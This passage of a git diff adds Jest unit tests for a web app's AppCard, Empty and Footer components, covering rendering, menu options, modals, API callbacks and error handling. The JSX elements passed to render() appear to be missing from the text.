+ 'onClick': () => setIsOpen(!isOpen), + 'data-testid': 'popover-trigger', + }, btnElement), + isOpen && React.createElement('div', { + 'data-testid': 'popover-content', + 'onMouseLeave': () => setIsOpen(false), + }, + typeof htmlContent === 'function' ? htmlContent({ open: isOpen, onClose: () => setIsOpen(false), onClick: () => setIsOpen(false) }) : htmlContent, + ), + ) + } + return { __esModule: true, default: MockPopover } +}) + +// Tooltip uses portals for positioning - minimal mock preserving popup content as title attribute +jest.mock('@/app/components/base/tooltip', () => ({ + __esModule: true, + default: ({ children, popupContent }: any) => React.createElement('div', { title: popupContent }, children), +})) + +// TagSelector imports service/tag which depends on ky ES module - mock to avoid Jest ES module issues +jest.mock('@/app/components/base/tag-management/selector', () => ({ + __esModule: true, + default: ({ tags }: any) => { + const React = require('react') + return React.createElement('div', { 'aria-label': 'tag-selector' }, + tags?.map((tag: any) => React.createElement('span', { key: tag.id }, tag.name)), + ) + }, +})) + +// AppTypeIcon has complex icon mapping logic - mock for focused component testing +jest.mock('@/app/components/app/type-selector', () => ({ + AppTypeIcon: () => React.createElement('div', { 'data-testid': 'app-type-icon' }), +})) + +// Import component after mocks +import AppCard from './app-card' + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockApp = (overrides: Record = {}) => ({ + id: 'test-app-id', + name: 'Test App', + description: 'Test app description', + mode: AppModeEnum.CHAT, + icon: '🤖', + icon_type: 'emoji' as const, + icon_background: '#FFEAD5', + icon_url: null, + author_name: 'Test Author', + created_at: 1704067200, + updated_at: 1704153600, + tags: [], + use_icon_as_answer_icon: false, + max_active_requests: null, + access_mode: AccessMode.PUBLIC, + has_draft_trigger: false, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as any, + app_model_config: {} as any, + site: {} as any, + api_base_url: 'https://api.example.com', + ...overrides, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('AppCard', () => { + const mockApp = createMockApp() + const mockOnRefresh = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should render without crashing', () => { + render() + // Use title attribute to target specific element + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should display app name', () => { + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should display app description', () => { + render() + expect(screen.getByTitle('Test app description')).toBeInTheDocument() + }) + + it('should display author name', () => { + render() + expect(screen.getByTitle('Test Author')).toBeInTheDocument() + }) + + it('should render app icon', () => { + // AppIcon component renders the emoji icon from app data + const { container } = render() + // Check that the icon container is rendered (AppIcon renders within the card) + const iconElement = container.querySelector('[class*="icon"]') || container.querySelector('img') + expect(iconElement || screen.getByText(mockApp.icon)).toBeTruthy() + }) + + it('should render app type icon', () => { + render() + expect(screen.getByTestId('app-type-icon')).toBeInTheDocument() + }) + + it('should display formatted edit time', () => { + render() + expect(screen.getByText(/edited/i)).toBeInTheDocument() + }) + }) + + describe('Props', () => { + it('should handle different app modes', () => { + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle app with tags', () => { + const appWithTags = { + ...mockApp, + tags: [{ id: 'tag1', name: 'Tag 1', type: 'app', binding_count: 0 }], + } + render() + // Verify the tag selector component renders + expect(screen.getByLabelText('tag-selector')).toBeInTheDocument() + }) + + it('should render with onRefresh callback', () => { + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + }) + + describe('Access Mode Icons', () => { + it('should show public icon for public access mode', () => { + const publicApp = { ...mockApp, access_mode: AccessMode.PUBLIC } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.anyone"]') + expect(tooltip).toBeInTheDocument() + }) + + it('should show lock icon for specific groups access mode', () => { + const specificApp = { ...mockApp, access_mode: AccessMode.SPECIFIC_GROUPS_MEMBERS } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.specific"]') + expect(tooltip).toBeInTheDocument() + }) + + it('should show organization icon for organization access mode', () => { + const orgApp = { ...mockApp, access_mode: AccessMode.ORGANIZATION } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.organization"]') + expect(tooltip).toBeInTheDocument() + }) + + it('should show external icon for external access mode', () => { + const externalApp = { ...mockApp, access_mode: AccessMode.EXTERNAL_MEMBERS } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.external"]') + expect(tooltip).toBeInTheDocument() + }) + }) + + describe('Card Interaction', () => { + it('should handle card click', () => { + render() + const card = screen.getByTitle('Test App').closest('[class*="cursor-pointer"]') + expect(card).toBeInTheDocument() + }) + + it('should call getRedirection on card click', () => { + const { getRedirection } = require('@/utils/app-redirection') + render() + const card = screen.getByTitle('Test App').closest('[class*="cursor-pointer"]')! + fireEvent.click(card) + expect(getRedirection).toHaveBeenCalledWith(true, mockApp, mockPush) + }) + }) + + describe('Operations Menu', () => { + it('should render operations popover', () => { + render() + expect(screen.getByTestId('custom-popover')).toBeInTheDocument() + }) + + it('should show edit option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + }) + }) + + it('should show duplicate option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.duplicate')).toBeInTheDocument() + }) + }) + + it('should show export option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.export')).toBeInTheDocument() + }) + }) + + it('should show delete option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('common.operation.delete')).toBeInTheDocument() + }) + }) + + it('should show switch option for chat mode apps', async () => { + const chatApp = { ...mockApp, mode: AppModeEnum.CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText(/switch/i)).toBeInTheDocument() + }) + }) + + it('should show switch option for completion mode apps', async () => { + const completionApp = { ...mockApp, mode: AppModeEnum.COMPLETION } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText(/switch/i)).toBeInTheDocument() + }) + }) + + it('should not show switch option for workflow mode apps', async () => { + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.queryByText(/switch/i)).not.toBeInTheDocument() + }) + }) + }) + + describe('Modal Interactions', () => { + it('should open edit modal when edit button is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const editButton = screen.getByText('app.editApp') + fireEvent.click(editButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + }) + + it('should open duplicate modal when duplicate button is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const duplicateButton = screen.getByText('app.duplicate') + fireEvent.click(duplicateButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + }) + + it('should open confirm dialog when delete button is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const deleteButton = screen.getByText('common.operation.delete') + fireEvent.click(deleteButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + }) + + it('should close confirm dialog when cancel is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const deleteButton = screen.getByText('common.operation.delete') + fireEvent.click(deleteButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('cancel-confirm')) + + await waitFor(() => { + expect(screen.queryByTestId('confirm-dialog')).not.toBeInTheDocument() + }) + }) + }) + + describe('Styling', () => { + it('should have correct card container styling', () => { + const { container } = render() + const card = container.querySelector('[class*="h-[160px]"]') + expect(card).toBeInTheDocument() + }) + + it('should have rounded corners', () => { + const { container } = render() + const card = container.querySelector('[class*="rounded-xl"]') + expect(card).toBeInTheDocument() + }) + }) + + describe('API Callbacks', () => { + it('should call deleteApp API when confirming delete', async () => { + render() + + // Open popover and click delete + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('common.operation.delete')) + }) + + // Confirm delete + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-confirm')) + + await waitFor(() => { + expect(appsService.deleteApp).toHaveBeenCalled() + }) + }) + + it('should call onRefresh after successful delete', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('common.operation.delete')) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-confirm')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should handle delete failure', async () => { + (appsService.deleteApp as jest.Mock).mockRejectedValueOnce(new Error('Delete failed')) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('common.operation.delete')) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-confirm')) + + await waitFor(() => { + expect(appsService.deleteApp).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: expect.stringContaining('Delete failed') }) + }) + }) + + it('should call updateAppInfo API when editing app', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.editApp')) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-edit-modal')) + + await waitFor(() => { + expect(appsService.updateAppInfo).toHaveBeenCalled() + }) + }) + + it('should call copyApp API when duplicating app', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.duplicate')) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-duplicate-modal')) + + await waitFor(() => { + expect(appsService.copyApp).toHaveBeenCalled() + }) + }) + + it('should call onPlanInfoChanged after successful duplication', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.duplicate')) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-duplicate-modal')) + + await waitFor(() => { + expect(mockOnPlanInfoChanged).toHaveBeenCalled() + }) + }) + + it('should handle copy failure', async () => { + (appsService.copyApp as jest.Mock).mockRejectedValueOnce(new Error('Copy failed')) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.duplicate')) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-duplicate-modal')) + + await waitFor(() => { + expect(appsService.copyApp).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: 'app.newApp.appCreateFailed' }) + }) + }) + + it('should call exportAppConfig API when exporting', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(appsService.exportAppConfig).toHaveBeenCalled() + }) + }) + + it('should handle export failure', async () => { + (appsService.exportAppConfig as jest.Mock).mockRejectedValueOnce(new Error('Export failed')) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(appsService.exportAppConfig).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: 'app.exportFailed' }) + }) + }) + }) + + describe('Switch Modal', () => { + it('should open switch modal when switch button is clicked', async () => { + const chatApp = { ...mockApp, mode: AppModeEnum.CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + }) + + it('should close switch modal when close button is clicked', async () => { + const chatApp = { ...mockApp, mode: AppModeEnum.CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('close-switch-modal')) + + await waitFor(() => { + expect(screen.queryByTestId('switch-modal')).not.toBeInTheDocument() + }) + }) + + it('should call onRefresh after successful switch', async () => { + const chatApp = { ...mockApp, mode: AppModeEnum.CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-switch-modal')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should open switch modal for completion mode apps', async () => { + const completionApp = { ...mockApp, mode: AppModeEnum.COMPLETION } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + }) + }) + + describe('Open in Explore', () => { + it('should show open in explore option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.openInExplore')).toBeInTheDocument() + }) + }) + }) + + describe('Workflow Export with Environment Variables', () => { + it('should check for secret environment variables in workflow apps', async () => { + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(workflowService.fetchWorkflowDraft).toHaveBeenCalled() + }) + }) + + it('should show DSL export modal when workflow has secret variables', async () => { + (workflowService.fetchWorkflowDraft as jest.Mock).mockResolvedValueOnce({ + environment_variables: [{ value_type: 'secret', name: 'API_KEY' }], + }) + + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(screen.getByTestId('dsl-export-modal')).toBeInTheDocument() + }) + }) + + it('should check for secret environment variables in advanced chat apps', async () => { + const advancedChatApp = { ...mockApp, mode: AppModeEnum.ADVANCED_CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(workflowService.fetchWorkflowDraft).toHaveBeenCalled() + }) + }) + }) + + describe('Edge Cases', () => { + it('should handle empty description', () => { + const appNoDesc = { ...mockApp, description: '' } + render() + expect(screen.getByText('Test App')).toBeInTheDocument() + }) + + it('should handle long app name', () => { + const longNameApp = { + ...mockApp, + name: 'This is a very long app name that might overflow the container', + } + render() + expect(screen.getByText(longNameApp.name)).toBeInTheDocument() + }) + + it('should handle empty tags array', () => { + const noTagsApp = { ...mockApp, tags: [] } + // With empty tags, the component should still render successfully + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle missing author name', () => { + const noAuthorApp = { ...mockApp, author_name: '' } + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle null icon_url', () => { + const nullIconApp = { ...mockApp, icon_url: null } + // With null icon_url, the component should fall back to emoji icon and render successfully + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should use created_at when updated_at is not available', () => { + const noUpdateApp = { ...mockApp, updated_at: 0 } + render() + expect(screen.getByText(/edited/i)).toBeInTheDocument() + }) + + it('should handle agent chat mode apps', () => { + const agentApp = { ...mockApp, mode: AppModeEnum.AGENT_CHAT } + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle advanced chat mode apps', () => { + const advancedApp = { ...mockApp, mode: AppModeEnum.ADVANCED_CHAT } + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle apps with multiple tags', () => { + const multiTagApp = { + ...mockApp, + tags: [ + { id: 'tag1', name: 'Tag 1', type: 'app', binding_count: 0 }, + { id: 'tag2', name: 'Tag 2', type: 'app', binding_count: 0 }, + { id: 'tag3', name: 'Tag 3', type: 'app', binding_count: 0 }, + ], + } + render() + // Verify the tag selector renders (actual tag display is handled by the real TagSelector component) + expect(screen.getByLabelText('tag-selector')).toBeInTheDocument() + }) + + it('should handle edit failure', async () => { + (appsService.updateAppInfo as jest.Mock).mockRejectedValueOnce(new Error('Edit failed')) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.editApp')) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-edit-modal')) + + await waitFor(() => { + expect(appsService.updateAppInfo).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: expect.stringContaining('Edit failed') }) + }) + }) + + it('should close edit modal after successful edit', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.editApp')) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-edit-modal')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should render all app modes correctly', () => { + const modes = [ + AppModeEnum.CHAT, + AppModeEnum.COMPLETION, + AppModeEnum.WORKFLOW, + AppModeEnum.ADVANCED_CHAT, + AppModeEnum.AGENT_CHAT, + ] + + modes.forEach((mode) => { + const testApp = { ...mockApp, mode } + const { unmount } = render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + unmount() + }) + }) + + it('should handle workflow draft fetch failure during export', async () => { + (workflowService.fetchWorkflowDraft as jest.Mock).mockRejectedValueOnce(new Error('Fetch failed')) + + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(workflowService.fetchWorkflowDraft).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: 'app.exportFailed' }) + }) + }) + }) + + // -------------------------------------------------------------------------- + // Additional Edge Cases for Coverage + // -------------------------------------------------------------------------- + describe('Additional Coverage', () => { + it('should handle onRefresh callback in switch modal success', async () => { + const chatApp = createMockApp({ mode: AppModeEnum.CHAT }) + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + + // Trigger success callback + fireEvent.click(screen.getByTestId('confirm-switch-modal')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should render popover menu with correct styling for different app modes', async () => { + // Test completion mode styling + const completionApp = createMockApp({ mode: AppModeEnum.COMPLETION }) + const { unmount } = render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + }) + + unmount() + + // Test workflow mode styling + const workflowApp = createMockApp({ mode: AppModeEnum.WORKFLOW }) + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + }) + }) + + it('should stop propagation when clicking tag selector area', () => { + const multiTagApp = createMockApp({ + tags: [{ id: 'tag1', name: 'Tag 1', type: 'app', binding_count: 0 }], + }) + + render() + + const tagSelector = screen.getByLabelText('tag-selector') + expect(tagSelector).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/apps/empty.spec.tsx b/web/app/components/apps/empty.spec.tsx new file mode 100644 index 0000000000..8e7680958c --- /dev/null +++ b/web/app/components/apps/empty.spec.tsx @@ -0,0 +1,53 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import Empty from './empty' + +describe('Empty', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should render without crashing', () => { + render() + expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument() + }) + + it('should render 36 placeholder cards', () => { + const { container } = render() + const placeholderCards = container.querySelectorAll('.bg-background-default-lighter') + expect(placeholderCards).toHaveLength(36) + }) + + it('should display the no apps found message', () => { + render() + // Use pattern matching for resilient text assertions + expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument() + }) + }) + + describe('Styling', () => { + it('should have correct container styling for overlay', () => { + const { container } = render() + const overlay = container.querySelector('.pointer-events-none') + expect(overlay).toBeInTheDocument() + expect(overlay).toHaveClass('absolute', 'inset-0', 'z-20') + }) + + it('should have correct styling for placeholder cards', () => { + const { container } = render() + const card = container.querySelector('.bg-background-default-lighter') + expect(card).toHaveClass('inline-flex', 'h-[160px]', 'rounded-xl') + }) + }) + + describe('Edge Cases', () => { + it('should handle multiple renders without issues', () => { + const { rerender } = render() + expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument() + + rerender() + expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/apps/footer.spec.tsx b/web/app/components/apps/footer.spec.tsx new file mode 100644 index 0000000000..291f15a5eb --- /dev/null +++ b/web/app/components/apps/footer.spec.tsx @@ -0,0 +1,94 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import Footer from './footer' + +describe('Footer', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should render without crashing', () => { + render(